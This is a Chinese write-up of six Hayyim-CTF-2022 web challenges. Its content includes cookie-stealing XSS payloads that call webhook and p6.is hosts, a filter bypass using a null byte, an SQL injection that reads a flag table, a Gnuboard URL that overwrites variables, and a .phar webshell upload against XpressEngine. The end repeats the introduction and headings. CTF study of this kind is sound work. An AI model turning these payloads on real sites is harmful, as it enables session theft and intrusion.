Hayyim-CTF-2022 Web题目全解析与教学文档<\/h1>

0x00 背景介绍<\/h2>
本文详细解析Hayyim-CTF-2022中的Web题目，包含6个Web挑战（含一个revenge），难度中等但思路新颖有趣。这些题目涉及XSS漏洞利用、SQL注入、变量覆盖、HTML解析器绕过、文件上传等多种Web安全技术。<\/p>

0x01 Cyberchef - XSS漏洞利用<\/h2>

漏洞分析<\/h3>

题目提供了一个较新版本的Cyberchef工具和一个bot<\/li>
通过GitHub issue搜索发现未修复的XSS漏洞<\/li>
漏洞存在于Scatter chart和Series chart组件中<\/li>

<svg><\/code>标签内对color属性未正确转义<\/li>
<\/ul>
利用方法<\/h3>

构造恶意payload注入到color属性中：<\/li>
<\/ol>
#<\/span>recipe<\/span>=<\/span>Scatter_chart<\/span>('Line%20feed'<\/span>,'Space'<\/span>,false<\/span>,''<\/span>,''<\/span>,'red%22%3E%3Cscript%3Edocument.location='<\/span>webhook<\/span>.xxx<\/span>?<\/span>cookie<\/span>=<\/span>'%20+%20document.cookie;%3C\/script%3E'<\/span>,100<\/span>,false<\/span>)&<\/span>input<\/span>=<\/span>MTAwLCAxMDA<\/span>
<\/span><\/span><\/code><\/pre>
发送链接给bot，在webhook接收cookie<\/li>
<\/ol>
预期解法（非预期解法）<\/h3>
import<\/span> requests
<\/span><\/span>payload =<\/span> "http:\/\/cyberchef:8000\/#recipe=JPath_expression('$..%5B?((%7B__proto__:%5B%5D.constructor%7D).constructor(<\/span>%22s<\/span>elf.postMessage(%7Baction:%5C'bakeComplete%5C',data:%7BbakeId:1,dish:%7Btype:1,value:%5C'%5C'%7D,duration:1,error:false,id:undefined,inputNum:2,progress:1,result:%5C'%3Ciframe\/onload%3Dfetch(`http:\/\/p6.is\/flag?$<\/span>{document.cookie}<\/span>`)<\/span>%3E<\/span>%5C',type:<\/span>%20%<\/span>5C'html%5C'%7D%7D);%22)();)%5D','%5C%5Cn')&input=W3t9XQ"<\/span>
<\/span><\/span>res =<\/span> requests.<\/span>post('http:\/\/1.230.253.91:8001\/report'<\/span>, data =<\/span> {'url'<\/span>: payload}, allow_redirects=<\/span>False<\/span>)
<\/span><\/span><\/code><\/pre>0x02 CyberHeadChef - 绕过过滤<\/h2>
题目修改<\/h3>

出题人发现非预期解法后，在bot中ban掉了"chart"关键字<\/li>
意图迫使选手使用预期0day解法<\/li>
<\/ul>
绕过方法<\/h3>

利用Chrome浏览器会忽略不可见字符的特性<\/li>
在"chart"中插入空字符%00：<\/li>
<\/ul>
#recipe=Scatter_cha%00rt
<\/code><\/pre>
0x03 not_e - SQL注入<\/h2>
漏洞分析<\/h3>

题目提供登录和发表note功能<\/li>
插入数据时对标题中的"?"替换为空<\/li>
导致SQL语句结构被破坏，可注入恶意SQL<\/li>
<\/ul>
利用方法<\/h3>

构造特殊标题和内容：<\/li>
<\/ol>
title=?&content=,(select flag from flag),'test
<\/code><\/pre>
（注意test[]需替换为实际用户名）<\/p>

最终生成的SQL语句：<\/li>
<\/ol>
insert<\/span> into<\/span> posts values<\/span> ("noteid"<\/span>, ""<\/span>,(select<\/span> flag from<\/span> flag),'test'<\/span>)
<\/span><\/span><\/code><\/pre>0x04 Gnuboard - 变量覆盖导致文件读取<\/h2>
漏洞分析<\/h3>

韩国系统Gnuboard的0day漏洞<\/li>
flag存储在common.php中<\/li>
\/shop\/inicis\/instdpay_result.php文件存在变量覆盖漏洞<\/li>
<\/ul>
利用方法<\/h3>

控制关键变量：<\/li>
<\/ol>

设置resultCode=0000<\/li>
authUrl设置为不可访问的网站<\/li>
netCancelUrl指向攻击者控制的服务器<\/li>
<\/ul>

构造payload：<\/li>
<\/ol>
http:\/\/1.230.253.91:5000\/shop\/inicis\/inistdpay_result.php?authUrl=https:\/\/test.com&resultCode=0000&netCancelUrl=https:\/\/服务器\/1.php&a=flag
<\/code><\/pre>

1.php内容简单返回一个值即可：<\/li>
<\/ol>
<?<\/span>php<\/span> echo<\/span> "a"<\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>0x05 Marked - HTML解析器绕过<\/h2>
漏洞分析<\/h3>

使用markdown转HTML功能<\/li>
使用node-html-parser进行sanitize过滤<\/li>
可通过特殊字符组合绕过过滤<\/li>
<\/ul>
利用脚本<\/h3>
import<\/span> requests,<\/span> random
<\/span><\/span>HOST =<\/span> 'http:\/\/1.230.253.91:3000'<\/span>
<\/span><\/span>s =<\/span> requests.<\/span>Session()
<\/span><\/span>res =<\/span> s.<\/span>post(HOST +<\/span> '\/login'<\/span>, {'username'<\/span>: 'posix'<\/span>, 'password'<\/span>: '1337'<\/span>})
<\/span><\/span>res =<\/span> s.<\/span>post(HOST +<\/span> '\/new'<\/span>, {
<\/span><\/span>    'title'<\/span>: 'abcd'<\/span>,
<\/span><\/span>    'content'<\/span>: "<\/header <a><a <\/span>\t<\/span> ><h<a <\/span>\x0B<\/span> style='animation-name:spinner-donut-anim'onanimationend='fetch(`http: <\/span>\\<\/span> x2f <\/span>\\<\/span> x2fp6.is <\/span>\\<\/span> x2fflag <\/span>\\<\/span> x2f$<\/span>{document.cookie}<\/span>`)' "<\/span>
<\/span><\/span>})
<\/span><\/span>print(res.<\/span>text)
<\/span><\/span><\/code><\/pre>0x06 xpressengine - 文件上传绕过<\/h2>
漏洞分析<\/h3>

韩国PHPCMS系统<\/li>
媒体上传功能存在phar文件上传漏洞<\/li>
核心文件：\/core\/src\/Xpressengine\/MediaLibrary\/MediaLibraryHandler.php<\/li>
<\/ul>
利用方法<\/h3>

分析mimeFilter黑名单：<\/li>
<\/ol>

发现未过滤.phar文件<\/li>
但过滤了.php、.php3、.phtml等常见PHP扩展<\/li>
<\/ul>

上传.phar格式的webshell<\/li>
访问上传的phar文件获取flag<\/li>
<\/ol>
防御建议<\/h3>

补充.phar到黑名单<\/li>
使用更严格的文件类型验证机制<\/li>
<\/ul>
0x07 总结<\/h2>
本CTF中的Web题目展示了多种实际漏洞利用技术：<\/p>

已知漏洞的快速利用（Cyberchef）<\/li>
过滤机制的绕过技巧（CyberHeadChef）<\/li>
非常规SQL注入（not_e）<\/li>
变量覆盖导致敏感信息泄露（Gnuboard）<\/li>
HTML解析器特性绕过（Marked）<\/li>
文件上传黑名单绕过（xpressengine）<\/li>
<\/ol>
这些技术在实际渗透测试中都有广泛应用，理解其原理和利用方法对提升Web安全能力至关重要。<\/p>

Hayyim-CTF-2022 Web题目全解析与教学文档<\/h1>

0x00 背景介绍<\/h2> 本文详细解析Hayyim-CTF-2022中的Web题目，包含6个Web挑战（含一个revenge），难度中等但思路新颖有趣。这些题目涉及XSS漏洞利用、SQL注入、变量覆盖、HTML解析器绕过、文件上传等多种Web安全技术。<\/p>

0x01 Cyberchef - XSS漏洞利用<\/h2>

0x02 CyberHeadChef - 绕过过滤<\/h2>

0x03 not_e - SQL注入<\/h2>

0x04 Gnuboard - 变量覆盖导致文件读取<\/h2>

0x05 Marked - HTML解析器绕过<\/h2>

0x06 xpressengine - 文件上传绕过<\/h2>

0x00 背景介绍<\/h2>
本文详细解析Hayyim-CTF-2022中的Web题目，包含6个Web挑战（含一个revenge），难度中等但思路新颖有趣。这些题目涉及XSS漏洞利用、SQL注入、变量覆盖、HTML解析器绕过、文件上传等多种Web安全技术。<\/p>